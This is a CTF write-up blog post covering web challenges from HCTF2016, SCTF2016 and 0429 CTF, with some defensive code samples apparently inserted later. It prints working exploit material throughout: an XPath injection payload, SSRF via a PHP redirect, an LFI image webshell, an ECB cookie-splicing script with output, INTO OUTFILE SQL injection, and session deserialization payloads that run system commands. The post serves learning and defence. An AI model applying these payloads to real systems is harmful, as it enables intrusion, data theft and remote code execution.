Recent CTF Summary

Notes on the techniques from recent CTF challenges; there are more and more CTF competitions now.

HCTF2016

injection (xpath injection)

An XPath injection challenge. After obtaining the source, the relevant code looks like this:

<?php
if(file_exists('t3stt3st.xml')) {
    $xml = simplexml_load_file('t3stt3st.xml');
    $user=$_GET['user'];
    $user=str_replace($re, ' ', $user);   // $re is defined elsewhere in the challenge source
    // $user=str_replace("'", "&apos", $user);   // quote escaping is commented out
    $query="user/username[@name='".$user."']";   // user input concatenated straight into the XPath expression

    $ans = $xml->xpath($query);
    foreach($ans as $x => $x_value)
    {
        echo $x.": " . $x_value;
        echo "<br />";
    }
}

XPath syntax: http://www.w3school.com.cn/xpath/xpath_syntax.asp
XPath injection: http://blog.csdn.net/yefan2222/article/details/7227932 The key points:

The | operator plays the same role as UNION in SQL injection.

/bookstore/*   selects all child elements of the bookstore element.
//*            selects all elements in the document.
//title[@*]    selects all title elements that have any attribute.

This gives the following payload, which displays every node:

?user=']|//*|//*['

It can be seen as executing the following query, which is why the injection succeeds:

user/username[@name='  ']|//*|//*['  ']"
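As an added example (not part of the original write-up), the same query built safely: an XPath string-literal helper that neutralises the `']|//*|//*['` payload above, plus a cheap check that the finished query still contains a single predicate.

```python
def xpath_string_literal(value: str) -> str:
    """Return an XPath 1.0 string literal that evaluates to exactly `value`.

    XPath 1.0 has no escape sequences, so the literal uses whichever quote
    kind the value does not contain; if it contains both, the pieces are
    joined with concat()."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = ["'%s'" % p for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


def build_user_query(user: str) -> str:
    """Safe counterpart of the page's $query = "user/username[@name='" . $user . "']"."""
    return "user/username[@name=%s]" % xpath_string_literal(user)


def vulnerable_user_query(user: str) -> str:
    """The page's original concatenation, kept only for comparison."""
    return "user/username[@name='" + user + "']"


def is_single_predicate(query: str) -> bool:
    """Cheap check to log or alert on: a finished query must not contain the
    union operator '|' outside a string literal (a heuristic, not a full
    XPath parser)."""
    quote = None
    for ch in query:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "|":
            return False
    return True
```

With lxml the value can also be passed as an XPath variable, e.g. `tree.xpath("user/username[@name=$name]", name=user)`, which avoids building the literal at all.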

Hack my net (SSRF)

The challenge name hints at the internal network, so test for SSRF. First, visiting the page gives two pieces of information: the task is to find a way to read the data in http://localareanet/all.conf.
See this article on SSRF bypass tricks: http://www.wooyun.org/bugs/wooyun-2015-099135 First test whether a chosen IP can be reached:

http://120.26.224.102:25045/ea57f09ea421245047b86eaba834fae1/?u=http://nohackair.net:80@121.42.175.111/test.css

The CSS file is returned, and the request shows up in the access log:

120.26.224.102:63861 [200]: /test.css

Now try forwarding the request through PHP.

Writing PHP to forward the request

This is the key idea: if the Content-Type is not text/css, the server responds with a 501 error. Testing shows it works:

php -S 0.0.0.0:8080

<?php
// 1.php
header('Content-Type:text/css;location:http://121.42.175.111:8080/test.css');

Request ?u=http://nohackair.net:80@121.42.175.111:8080/1.php, then go after the internal network by changing the header to:

header('Content-Type:text/css;Location:http://localareanet/all.conf');

The information is retrieved successfully:
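Added example, not from the original write-up: how a fetcher on the target's side can close both tricks used above (the `nohackair.net:80@` userinfo prefix and the redirect to `http://localareanet/all.conf`) by validating the parsed host of every hop. `ALLOWED_HOSTS` and `demo_fetch` are assumptions constructed for the demo.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"nohackair.net"}      # assumption: the only origin the app may fetch from
REDIRECT_CODES = (301, 302, 303, 307, 308)


def check_fetch_url(url: str):
    """Return (ok, reason) for one URL. Decides on the parsed host, so a
    userinfo prefix such as 'nohackair.net:80@' in front of the real host is
    ignored rather than matched."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname          # '121.42.175.111' for nohackair.net:80@121.42.175.111
    if not host:
        return False, "no host"
    try:
        ip = ipaddress.ip_address(host)
        if not ip.is_global:       # loopback, private, link-local, reserved
            return False, "internal address %s" % ip
    except ValueError:
        pass                       # a name, not an IP literal; see note below
    if host not in ALLOWED_HOSTS:
        return False, "host not allowed: %s" % host
    return True, "ok"


def safe_fetch(url: str, fetch, max_hops: int = 3):
    """fetch(url) -> (status, headers, body) and must NOT follow redirects
    itself; every Location target is re-checked here before the next hop.
    Returns (body, "ok") or (None, reason)."""
    for _ in range(max_hops):
        ok, reason = check_fetch_url(url)
        if not ok:
            return None, reason
        status, headers, body = fetch(url)
        location = headers.get("Location")
        if status in REDIRECT_CODES and location:
            url = location             # e.g. the page's Location: http://localareanet/all.conf
            continue
        return body, "ok"
    return None, "too many redirects"


def demo_fetch(url: str):
    """Constructed stand-in for the network: /1.css redirects to the internal
    config, everything else returns a CSS body."""
    if url == "http://nohackair.net/1.css":
        return 302, {"Location": "http://localareanet/all.conf"}, b""
    return 200, {"Content-Type": "text/css"}, b"body { color: red }"
```

A hostname that passes the allowlist should still be resolved and the resolved address checked with the same rule, since a DNS name can point at an internal address; that step is omitted here to keep the example offline.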

SCTF2016

Homework

  • There is an LFI.
  • There is a file upload, but uploaded images are rewritten by an imagecreatefrom*** function.

However, some parts of a GIF survive that processing unchanged.
http://www.freebuf.com/articles/web/54086.html So upload an image and then include it to obtain a shell.

  • One pitfall:

The flag is not in the database; file source can be read.
The server disables phpinfo and many other functions. To list the directory I eventually found PHP's glob function. The payload:

http://homework.sctf.xctf.org.cn/homework.php?homework=upload/673522368.gif

c=echo "<br />**********<br />";
foreach (glob("*") as $filename) {
    echo "$filename size " . filesize($filename) . "\n";
}
echo "<br />**********<br />";

http://homework.sctf.xctf.org.cn/4ff692fb12aa996e27f0a108bfc386c2

SCTF{g00d_Good_Stu6y}

Summary:

  1. Some parts of the processed image remain unchanged.
  2. Including the image via LFI yields a shell.
  3. The shell was heavily restricted; in the end the glob function was used to list directories.

References:
http://php.net/manual/en/function.glob.php
http://drops.wooyun.org/tips/3978
http://www.freebuf.com/articles/web/54086.html
https://www.secgeek.net/bookfresh-vulnerability/

sycshell

I looked at this one after the contest; some techniques worth noting: http://58.213.63.27:61180/

  • Change the host and visit:

Viewing the page source gives:

<!-- Internal system info: http://sycshell.sycsec.com:61180/ -->

Edit the hosts file:

58.213.63.27    sycshell.sycsec.com

Visit: http://sycshell.sycsec.com:61180/

  • Decoding jother

The page source contains jother-encoded JS; a tool found online:

https://github.com/dNetGuru/JSUNFuck/releases

PS E:\pentest\tools\jother_decode> .\JSUNFuck.exe .\test.txt

Decoded result:

if(1==2){var tip="/W0Ca1N1CaiBuDa0/read.php?f=index";}else{alert(/No Tip/);})()

Visit http://sycshell.sycsec.com:61180/W0Ca1N1CaiBuDa0/read.php?f=index to get the source:

<?php
show_source(__FILE__);
$pass = @$_GET['pass'];
$a = "syclover";

strlen($pass) > 15 ? die("Don't Hack me!") : "";

if(!is_numeric($pass) || preg_match('/0(x)?|-|\+|\s|^(\.|\d).*$/i',$pass)){
    die('error');
}

if($pass == 1 && $a[$pass] === "s"){
    $file = isset($_GET['f']) ? $_GET['f'].'.php' : 'index.php';
    @include $file;
}

  • Code audit, bypassing the restrictions

The bypass is worth learning: %0b is a vertical tab, which is_numeric() skips as leading whitespace but which PCRE's \s did not match (before PCRE 8.34), so the ^(\.|\d) branch never fires; .1e1 compares equal to 1, and as a string offset it is truncated to 0, which picks the "s" of "syclover":

http://sycshell.sycsec.com:61180/W0Ca1N1CaiBuDa0/read.php?f=index&&pass=%0b.1e1

References:

https://www.sco4x0.com/archives/sctf-2016.html

http://zone.wooyun.org/content/23961
http://zone.wooyun.org/content/24075

Checking phpinfo shows a waf.php:

http://58.213.63.27:61180/phpinfo.php

auto_prepend_file /home/wwwroot/waf.php /home/wwwroot/waf.php

Read the contents of waf.php:

http://sycshell.sycsec.com:61180/W0Ca1N1CaiBuDa0/read.php?f=php://filter/convert.base64-encode/resource=/home/wwwroot/waf&&pass=%0B.1e1

<?php
if(isset($_GET['f']) && preg_match("/zip|phar/",$_GET['f'],$array)){
    die("SycWaf: Don't Hack me!");
}

  • phpinfo + LFI to upload a shell

I will look at this part in more detail later and write it up.

0429 CTF

web1

  • The cookie is encrypted; the encryption has to be broken so that uid becomes 6.

Restriction:

  • Registered usernames and passwords must be at least three characters long.

The approach follows: http://www.freebuf.com/news/special/56506.html Steps:

aaaaaaaaaaaaaaaa  encrypts to: GL209w8nYzcGE05CFQU2kA==
aaaaaaaaaaaaaaaa1 encrypts to: *******
After base64 decoding, the first 16 bytes (viewed as hex) are identical; base64-encode the data after them.

The code:

def getCookie(uid_cookie):
    tmp = base64.b64decode(urllib.unquote(uid_cookie))
    return urllib.quote(base64.b64encode(tmp[16:]))

The complete Python program:

# Python 2 script (print statement, urllib.unquote); run as:
#   python anheng_web1.py <low> <high>
import requests
from requests.auth import HTTPBasicAuth
import sys
import base64
import urllib

session = requests.Session()


def getCookie(uid_cookie):
    # drop the first 16-byte block (the sixteen 'a's), keep the block for the suffix
    tmp = base64.b64decode(urllib.unquote(uid_cookie))
    return urllib.quote(base64.b64encode(tmp[16:]))


def go(low, high):
    for i in range(low, high):
        url_1 = "http://120.27.156.171/index.php?action=action&mod=register"
        # username=admin1&password=123456789dasdas
        post_data = {'username': 'aaaaaaaaaaaaaaaa' + str(i), 'password': '123456789dasdas'}

        headers = {"Accept-Encoding": "gzip, deflate",
                   "Accept-Language": "en-US,en;q=0.5",
                   "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Connection": "keep-alive"}
        response = session.post(url_1, headers=headers, data=post_data)
        # print response.text

        url_2 = "http://120.27.156.171/index.php?action=action&mod=login"
        response = session.post(url_2, headers=headers, allow_redirects=False, data=post_data)
        # print response.text
        # print response.headers
        # print response.cookies['username']
        uid_cookie = response.cookies['username']
        # uid = response.cookies['uid']
        # print uid
        # print uid_cookie

        uid = getCookie(uid_cookie)
        print "uid" + ":" + uid

        cookies = {'uid': uid, 'username': '13FqE9LbOVXK1HDHrE5R0w%3D%3D'}
        # print cookies

        url_3 = "http://120.27.156.171/index.php?action=view&mod=index"
        response = session.get(url_3, headers=headers, cookies=cookies)
        # print response.text
        res_text = response.text
        # 849 is the offset of "Hello guest." in the ordinary page; anything else means a different user
        res = res_text.find("Hello guest.")
        print str(i) + ":" + str(res)
        # print res_text
        if res != 849:
            print res_text
            break


if __name__ == '__main__':
    go(int(sys.argv[1]), int(sys.argv[2]))

Running python anheng_web1.py 0 100 gives:

uid:fuyAU3Nwc2bUCp1e0Zzu1w%3D%3D
0:849
uid:1jpbdzOuTYfkWAXATq%2BZ3g%3D%3D
1:849
uid:M29zL6gcxfM4qYbXMerslw%3D%3D
2:849
uid:jEixf/V/%2BxwafdRfqKL9eg%3D%3D
3:849
uid:kJ7XlgcipAf3235vF5wE1Q%3D%3D
4:849
uid:gaI5Y%2Bm%2B4/2VDJmcfNFL2w%3D%3D
5:849
uid:q5gLEAAP77TBeKxIBh2pgw%3D%3D
6:-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Home</title>
</head>
<body>
<p>
<a href="./index.php?action=view&mod=logout&1460965977">Logout</a>
</p>
<p>
<span>Hi admin. </span>
<span>(Administrator)</span><br>
flag{1284dc540c427d9b02ef5e0956e95489} </p>
</body>
</html>
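Added example (my own, not the write-up's script) showing why dropping the first 16 bytes of the username cookie yields a valid uid cookie, and a cookie format that rejects the splice. The cipher is a constructed stand-in; the key and the cookie layout are assumptions.

```python
import base64
import hashlib
import hmac

BLOCK = 16


def zero_pad(data: bytes) -> bytes:
    """Pad with NUL bytes up to a block boundary; no extra block is added for
    aligned input (the page's 24-char cookie for 16 'a's decodes to 16 bytes)."""
    return data + b"\x00" * (-len(data) % BLOCK)


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Constructed stand-in cipher: each 16-byte block is XORed with the same
    key-derived pad. Like any ECB-mode cipher, equal plaintext blocks give
    equal ciphertext blocks wherever they sit; the splice relies on nothing else."""
    pad = hashlib.sha256(key).digest()[:BLOCK]
    padded = zero_pad(plaintext)
    return b"".join(bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], pad))
                    for i in range(0, len(padded), BLOCK))


def encrypt_cookie(key: bytes, value: bytes) -> str:
    return base64.b64encode(ecb_encrypt(key, value)).decode()


def strip_first_block(cookie: str) -> str:
    """The page's getCookie(): drop the block holding the sixteen 'a's."""
    raw = base64.b64decode(cookie)
    return base64.b64encode(raw[BLOCK:]).decode()


def splice_works(key: bytes, uid: bytes = b"6") -> bool:
    """username 'a'*16 + uid, minus its first block, equals the cookie for uid alone."""
    spliced = strip_first_block(encrypt_cookie(key, b"a" * BLOCK + uid))
    return spliced == encrypt_cookie(key, uid)


def make_cookie(key: bytes, value: bytes) -> str:
    """Mitigation: append an HMAC over the ciphertext so a cut-and-pasted
    block fails verification (a nonce-based AEAD would be the usual choice)."""
    ct = encrypt_cookie(key, value)
    return ct + "." + hmac.new(key, ct.encode(), hashlib.sha256).hexdigest()


def verify_cookie(key: bytes, cookie: str):
    """Return the ciphertext part when the tag is valid, otherwise None."""
    ct, _, tag = cookie.rpartition(".")
    expected = hmac.new(key, ct.encode(), hashlib.sha256).hexdigest()
    return ct if hmac.compare_digest(tag, expected) else None
```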

web2

  • There is an ORDER BY injection vulnerability.

Write database contents out to a file:

http://120.27.145.45/index.php?action=view&mod=index&by=age` AS DECIMAL) desc into outfile '/var/www/html/upload/evil_my_123.php'#

Notes:

  • Only the upload directory is writable.
  • The payload is built by concatenation.

Reference reading on ORDER BY injection:
http://www.jinglingshu.org/?p=10105
http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html

web3

PHP session injection; references: "Security risks of misconfigured PHP session serialize/unserialize handlers" (PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患), https://bugs.php.net/bug.php?id=71101 and http://php.net/manual/zh/session.upload-progress.php. The object to be unserialized is constructed as:

<?php

require_once("./class.php");

$foo3 = new foo3();
$foo3->varr = "echo system('ls ./');";

$foo2 = new foo2();
$foo2->obj = $foo3;

$foo1 = new foo1();
$foo1->varr = $foo2;

$ser = serialize($foo1);
echo $ser."\n";
echo str_replace("\"","\\\"",$ser);
?>

  • The upload HTML file constructed:

    <form action="http://120.27.156.224/phpinfo.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="ryat" />
    <input type="file" name="file" />
    <input type="submit" />
    </form>
  • Change its PHP_SESSION_UPLOAD_PROGRESS value as follows:

  • Note the leading | that performs the injection.

    |O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:21:"echo system('ls ./');";}}}
  • Submit to phpinfo.php first, then visit index.php to see the result:

  • Regenerate the serialized data for every attempt, because the string length changes.

    |O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:23:"echo system('ls /var');";}}}

    The length of the executed code changes: s:23:"echo system('ls /var');" differs from the earlier s:21:"echo system('ls ./');"; 21 became 23.

  • Final payload:

    |O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:79:"echo system('cat /var/www/html/flag_Z11O65g9uWbBUokxujdkc763h83hhZUuzoXe.php');";}}}
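Added example (not from the original write-up): a small PHP serialize() encoder in Python that computes the s:<len> fields itself, which is the pitfall noted above, plus the key/value split the php session handler applies to data written by the php_serialize handler. foo2's varr is taken from the serialized string on the page; class.php itself is not shown there, and the progress array is a simplified, constructed stand-in.

```python
from collections import namedtuple

PhpObject = namedtuple("PhpObject", "cls props")   # props: {name: value}, insertion order kept


def php_serialize(value) -> str:
    """Subset of PHP's serialize(): bool, int, str, array (dict) and object."""
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # the length is a byte count, so "echo system('ls ./');" is s:21
        # and "echo system('ls /var');" is s:23
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type %s" % type(value).__name__)


def foo_chain(varr: str) -> str:
    """foo1 -> foo2 -> foo3 chain as on the page, with foo3.varr = varr."""
    foo3 = PhpObject("foo3", {"varr": varr})
    foo2 = PhpObject("foo2", {"varr": "1234567890", "obj": foo3})
    return php_serialize(PhpObject("foo1", {"varr": foo2}))


def stored_by_php_serialize(progress_name: str) -> str:
    """Constructed, simplified: what the php_serialize handler writes for the
    upload-progress entry, whose key is the prefix plus the submitted name."""
    return php_serialize({"upload_progress_" + progress_name: {"done": True}})


def read_by_php_handler(stored: str):
    """The php handler takes the text up to the first '|' as the variable
    name and unserializes what follows. With a '|' inside the submitted
    name, the value starts at the injected object, not at the progress array."""
    name, _, value = stored.partition("|")
    return name, value
```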
Author: angelwhu
Link: https://www.angelwhu.com/paper/2016/05/20/recent-ctf-related-summary/
License: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit angelwhu_blog when reposting.